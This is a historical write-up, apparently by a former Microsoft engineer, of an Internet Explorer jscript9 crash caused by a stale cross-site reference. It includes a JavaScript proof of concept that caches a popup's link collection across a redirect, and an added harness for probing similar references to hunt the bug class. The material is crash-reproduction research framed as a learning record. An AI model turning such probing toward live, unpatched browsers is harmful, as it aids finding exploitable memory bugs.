I found that injecting elements into a newly opened window before its server-side redirect completed, and caching the window's document.links collection, caused a crash when the cached collection was accessed after the redirect. The access landed in jscript9!Js::CrossSite::MarshalVar, which tried to marshal a stale cross-site reference whose internal state was no longer valid.
var cachedLinks;

function main()
{
    // Open a window on a page that performs a server-side redirect (to bing in the original setup).
    var win = window.open("redirect.aspx", "", "width=200,height=200");
    // Keep the child window busy with a modal alert while the redirect is in flight.
    win.setTimeout('alert("Please, do not close this alert, just wait 4 seconds until bing loads...")');
    // Inject elements into the pre-redirect document ...
    var myDiv = win.document.createElement("div");
    win.document.appendChild(myDiv);
    myDiv.innerHTML = '<a href="1">AA</a><a href="1">AA</a>';
    // ... and cache the live document.links collection that now refers to them.
    cachedLinks = win.document.links;
    // Come back after the redirect has had time to complete.
    setTimeout('accessWindowDOM()', 4000);
}

function accessWindowDOM()
{
    // Touching the cached collection after the cross-site navigation crashes in jscript9!Js::CrossSite::MarshalVar.
    alert(cachedLinks[0].outerHTML); // Crash!
}
After the redirect, evaluating cachedLinks[0].outerHTML triggered a cross-site marshaling attempt that faulted at jscript9!Js::CrossSite::MarshalVar+0x19, reading through an invalid pointer at offset 0x644. The crash triage rated it UNKNOWN exploitability, noting that data from the faulting address controls branch selection: the stale pointer was being read, not written, but whatever it pointed at steered control flow, which is why the triage could neither confirm nor rule out exploitability.
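The original proof of concept caches one collection (document.links) and probes it once. The harness below is an added example, not the author's code: it caches several kinds of references into the popup before the navigation (the live links, forms and images collections, a static NodeList, and the old document object itself) and probes each after the redirect, classifying every access as a returned value, a SecurityError, or some other failure. The probing logic is kept free of browser globals so it can be exercised outside a browser; the browser part assumes, as in the original, a hypothetical "redirect.aspx" that redirects the popup to another origin, and it records what the browser does rather than assuming a particular outcome.

```javascript
// Added example (not the original PoC): cache several references into a popup
// before it navigates cross-origin and probe each of them afterwards.
// "redirect.aspx" is assumed, as in the original, to redirect to another origin.

// Pure part: run each named accessor and classify the outcome.
function probeAccessors(accessors) {
  const results = {};
  for (const [name, fn] of Object.entries(accessors)) {
    try {
      const value = fn();
      results[name] = { outcome: 'value', value: String(value) };
    } catch (e) {
      results[name] = {
        outcome: e && e.name === 'SecurityError' ? 'security-error' : 'error',
        value: e && e.message ? String(e.message) : String(e),
      };
    }
  }
  return results;
}

// Count outcomes so a run can be summarised in one line.
function summarise(results) {
  const counts = { value: 0, 'security-error': 0, error: 0 };
  for (const r of Object.values(results)) counts[r.outcome] += 1;
  return counts;
}

// Browser part: only runs when a window is available.
function runInBrowser() {
  const win = window.open('redirect.aspx', '', 'width=200,height=200');
  const doc = win.document;                       // pre-redirect document
  const div = doc.createElement('div');
  doc.body.appendChild(div);
  div.innerHTML = '<a href="1">AA</a><form></form><img alt="x">';

  // References cached before the navigation, as in the original PoC.
  const cached = {
    links: doc.links,                             // live HTMLCollection
    forms: doc.forms,                             // live HTMLCollection
    images: doc.images,                           // live HTMLCollection
    anchorNodeList: doc.querySelectorAll('a'),    // static NodeList
    oldDocument: doc,                             // the document object itself
  };

  // Probe once the redirect has had time to complete (4 s as in the original).
  setTimeout(() => {
    const results = probeAccessors({
      'win.document.URL (post-navigation)': () => win.document.URL,
      'cached links[0].outerHTML':          () => cached.links[0].outerHTML,
      'cached forms.length':                () => cached.forms.length,
      'cached images[0].alt':               () => cached.images[0].alt,
      'cached NodeList[0].textContent':     () => cached.anchorNodeList[0].textContent,
      'cached document.URL':                () => cached.oldDocument.URL,
    });
    console.table(results);
    console.log(summarise(results));
  }, 4000);
}

if (typeof window !== 'undefined' && typeof window.open === 'function') {
  runInBrowser();
}
```

Load the script from a page on the same origin as redirect.aspx and read the table from the console. The interesting rows are the ones where a reference cached before the navigation still returns a value afterwards: those are the stale cross-document references that the original crash lived in, and they are the accessors worth varying (other collections, other properties, other timings) when hunting for this bug class.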
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.